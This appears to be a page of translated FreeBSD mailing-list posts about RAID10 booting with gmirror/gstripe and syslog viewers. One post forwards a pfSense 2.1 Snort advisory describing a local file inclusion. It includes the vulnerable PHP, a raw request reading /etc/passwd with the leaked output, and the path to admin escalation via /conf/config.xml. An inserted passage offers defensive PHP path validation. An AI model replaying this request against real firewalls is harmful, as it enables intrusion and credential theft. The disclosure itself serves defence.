Re: [FUG-BR] Loading gmirror and gstripe in loader.conf
On 28/01/14 21:54, Paulo Henrique wrote:
>
> Sent from my Sony Xperia™ smartphone
>
> Marcelo Gondim wrote
>
>> Folks,
>>
>> I've been trying for a while now to put the whole disk, root included, on
>> gmirror+gstripe (raid10) and boot from it, and I can't. As soon as the boot
>> starts it throws "Not ufs" right away.
>> I believe the reason is that to load geom you first have to load the
>> kernel. ZFS works because it has a boot loader specific to it.
>> I only found one solution: put / outside the raid and put the rest (/usr,
>> swap, /var and /tmp) on the raid10. Has anyone managed to boot the system
>> with everything on geom raid?
>>
>> My loader.conf:
>>
>> geom_mirror_load="YES"
>> geom_stripe_load="YES"
>> vfs.root.mountfrom="ufs:/dev/stripe/root"
>>
>> []'s
>> Gondim
>>
> How are you creating the raid10?
> gstripe = gmirror + gmirror, or
> gmirror = gstripe + gstripe?
>

Hi Paulo,

Here is what I did in the VM I created:

ada0 - 10Gb
ada1 - 10Gb
ada2 - 10Gb
ada3 - 10Gb

On each disk I created the partitions: / swap /var /usr /tmp

root0, swap0, var0, usr0 and tmp0
root1, swap1, var1, usr1 and tmp1
root2, swap2, var2, usr2 and tmp2
root3, swap3, var3, usr3 and tmp3

First I did the gmirror:

gmirror label root0 /dev/gpt/root0 /dev/gpt/root1
gmirror label swap0 /dev/gpt/swap0 /dev/gpt/swap1
gmirror label var0 /dev/gpt/var0 /dev/gpt/var1
gmirror label usr0 /dev/gpt/usr0 /dev/gpt/usr1
gmirror label tmp0 /dev/gpt/tmp0 /dev/gpt/tmp1
gmirror label root1 /dev/gpt/root2 /dev/gpt/root3
gmirror label swap1 /dev/gpt/swap2 /dev/gpt/swap3
gmirror label var1 /dev/gpt/var2 /dev/gpt/var3
gmirror label usr1 /dev/gpt/usr2 /dev/gpt/usr3
gmirror label tmp1 /dev/gpt/tmp2 /dev/gpt/tmp3

Then I did the gstripe:

gstripe label root /dev/mirror/root0 /dev/mirror/root1
gstripe label swap /dev/mirror/swap0 /dev/mirror/swap1
gstripe label var /dev/mirror/var0 /dev/mirror/var1
gstripe label usr /dev/mirror/usr0 /dev/mirror/usr1
gstripe label tmp /dev/mirror/tmp0 /dev/mirror/tmp1

From what I can tell, I can't load gstripe and gmirror before the kernel is loaded, so /boot is not visible, which gives that error: Not ufs

What worked for me was taking / out of gmirror and gstripe; in that case the kernel and the gmirror and gstripe modules loaded. The rest worked fine.

My question was whether there is some way to load gmirror and gstripe before everything else, like Linux's initrd.

[]'s
Gondim

-
Archive: http://www.fug.com.br/historico/html/freebsd/
Leave the list: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Loading gmirror and gstripe in loader.conf

Sent from my Sony Xperia™ smartphone

Marcelo Gondim wrote
> Folks,
>
> I've been trying for a while now to put the whole disk, root included, on
> gmirror+gstripe (raid10) and boot from it, and I can't. As soon as the boot
> starts it throws "Not ufs" right away.
> I believe the reason is that to load geom you first have to load the
> kernel. ZFS works because it has a boot loader specific to it.
> I only found one solution: put / outside the raid and put the rest (/usr,
> swap, /var and /tmp) on the raid10. Has anyone managed to boot the system
> with everything on geom raid?
>
> My loader.conf:
>
> geom_mirror_load="YES"
> geom_stripe_load="YES"
> vfs.root.mountfrom="ufs:/dev/stripe/root"
>
> []'s
> Gondim
>

How are you creating the raid10?
gstripe = gmirror + gmirror, or
gmirror = gstripe + gstripe?

Regards.
Re: [FUG-BR] [FYI] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)
Show! (from a vulnerability research point of view)

@firebitsbr

2014-01-28 Welkson Renny de Medeiros:
> Gentlemen, good afternoon!
>
> Alert for anyone who uses the Snort package on pfSense.
>
> Welkson
>
> ...
>
> # Exploit Title: pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)
> # Date: 25/01/2014 (0-day)
> # Exploit Author: @u0x (Pichaya Morimoto)
> # Software Link: www.pfsense.org
> # Category: Local File Inclusion (LFI) & Privilege Escalation
> # Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
>
> ...
[FUG-BR] Loading gmirror and gstripe in loader.conf
Folks,

I've been trying for a while now to put the whole disk, root included, on gmirror+gstripe (raid10) and boot from it, and I can't. As soon as the boot starts it throws "Not ufs" right away.

I believe the reason is that to load geom you first have to load the kernel. ZFS works because it has a boot loader specific to it.

I only found one solution: put / outside the raid and put the rest (/usr, swap, /var and /tmp) on the raid10. Has anyone managed to boot the system with everything on geom raid?

My loader.conf:

geom_mirror_load="YES"
geom_stripe_load="YES"
vfs.root.mountfrom="ufs:/dev/stripe/root"

[]'s
Gondim
[FUG-BR] [FYI] pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)
Gentlemen, good afternoon!

Alert for anyone who uses the Snort package on pfSense.

Welkson

...

# Exploit Title: pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE)
# Date: 25/01/2014 (0-day)
# Exploit Author: @u0x (Pichaya Morimoto)
# Software Link: www.pfsense.org
# Category: Local File Inclusion (LFI) & Privilege Escalation
# Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
#

pfSense firewall/router distribution description :
==

pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations protecting thousands of network devices.

This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however it is not our primary focus.

Attack Scenario
==

Authenticated users with only permission to access some packages in the web GUI (a.k.a. webConfigurator) will be able to escalate themselves to other privileged admin by reading the /conf/config.xml file through bugs (i.e. Snort LFI), resulting in full compromise of the pfSense.

This attack abuses the user privilege scheme with some of the official packages (System > Package Manager)

* Session hijacking is also possible, to steal less privileged user sessions to perform this trick, due to "http" admin by default in webConfigurator.

Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion Vulnerability

Vulnerable file:
==

snort_log_view.php

[+] Checksum
SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
MD5: cd767e46a4e9e09ede7fd26560e37f14

Vulnerable Source Code :
==

http://www.pfsense.com/packages/config/snort/snort_log_view.php
https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php

...(deducted)...

$contents = '';
// Read the contents of the argument passed to us.
// Is it a fully qualified path and file?
if (file_exists($_GET['logfile']))
	$contents = file_get_contents($_GET['logfile']);
// It is not something we can display, so print an error.
else
	$contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not found!");
$pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
?>

...(deducted)...

Proof of Concept 1 : Arbitrary File Inclusion
==

GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
Host: firewall1.pentestlab1:1337
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: th,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083

HTTP/1.1 200 OK
Expires: Mon, 27 Jan 2014 07:25:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=18
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-type: text/html
Transfer-Encoding: chunked
Date: Sat, 25 Jan 2014 05:25:10 GMT
Server: lighttpd/1.4.32

...(deducted)...
root:*:0:0:Charlie &:/root:/bin/sh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
...(deducted)...
havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin
squid:*:100:100:squid caching-proxy pseudo user:/var/squid:/usr/sbin/nologin
c_icap:*:959:959:c-icap daemon:/var/empty:/usr/sbin/nologin
snortadmin:*:2000:65534:Bill Gates:/home/snortadmin:/sbin/nologin
...(deducted)...

Proof of Concept 2 : Directory Traversal

# This trick works on PHP 5.3.27 with Suhosin-Patch (cgi-fcgi) + Lighttpd/1.4.32 on FreeBSD 8.3 x64
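The advisory above shows snort_log_view.php handing $_GET['logfile'] straight to file_exists() and file_get_contents(), which is the whole bug. The following is an added example, not pfSense's or the Snort package's own code, of how that read could be constrained; it assumes the log files live directly under one fixed directory and that only bare file names are accepted, a narrower interface than the "fully qualified path" the original comment describes.

```php
<?php
// Added example, not pfSense or Snort package code: a constrained replacement
// for the unchecked $_GET['logfile'] read shown in snort_log_view.php.
// Assumption: Snort log files live directly under one fixed directory and the
// viewer only needs files from there, so only bare file names are accepted.

function snort_log_contents(string $requested, string $logdir): ?string
{
    // Reject anything that is not a plain file name: path separators, "." / ".."
    // (the traversal the advisory's PoC 2 refers to) and embedded NUL bytes.
    if ($requested === '' || basename($requested) !== $requested
        || $requested === '.' || $requested === '..'
        || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($logdir);
    if ($base === false) {
        return null;
    }
    // realpath() follows symlinks, so a link inside the log directory that
    // points at /conf/config.xml or /etc/passwd fails the prefix check below.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    $contents = file_get_contents($path);
    return $contents === false ? null : $contents;
}

// Constructed demonstration: a temporary log directory holding one log file and
// a symlink that tries to escape it, exercised with the inputs the advisory shows.
$dir = sys_get_temp_dir() . '/snortlog_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/alert', "01/25-05:25:10 [**] [1:1:1] constructed alert [**]\n");
@symlink('/etc/passwd', $dir . '/escape');

foreach (['alert', '/etc/passwd', '../../../etc/passwd', 'escape'] as $input) {
    $out = snort_log_contents($input, $dir);
    printf("%-22s -> %s\n", $input, $out === null ? 'rejected' : 'served ' . strlen($out) . ' bytes');
}

unlink($dir . '/alert');
@unlink($dir . '/escape');
rmdir($dir);
```

Only the bare name "alert" is served; the absolute path, the traversal string and the symlink are all refused before any file is read.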
Re: [FUG-BR] syslog via web
On 2014-01-27 8:59, mateus schott wrote:
> log-analyzer, phplogcon
>
>
> Mateus Schott
> Network Administrator
> LPI 1 - Junior Level Linux Certification
> Novell Certified Linux Administrator
>
> *“The box said: Requires MS Windows or better. So I installed Linux.”*
>
>
> On 27 January 2014 08:54, Denis Granato wrote:
>
>> Good morning gentlemen,
>>
>> Does anyone use a tool for viewing logs (syslog) over the web?
>>
>> I have some monitoring on my network and receive the logs in
>> /var/log/syslog-x.log, syslog-y.log, etc., and I would like to make
>> them available for viewing by my NOC
>>
>> Thanks

Besides loganalyzer, I tried a solution with elasticsearch + logstash + kibana (the viewer). It is very fast for searching the logs (you have to learn the Apache Lucene syntax, but the basics are simple). I had a problem where elasticsearch kept consuming all of the system's file descriptors, and even after raising kern.maxfiles and kern.maxfilesperproc to quite high values (65k) I didn't have time to resolve that issue. But there it is as another alternative.

--
vic
choppnerd.com
donttrack.us | dontbubble.us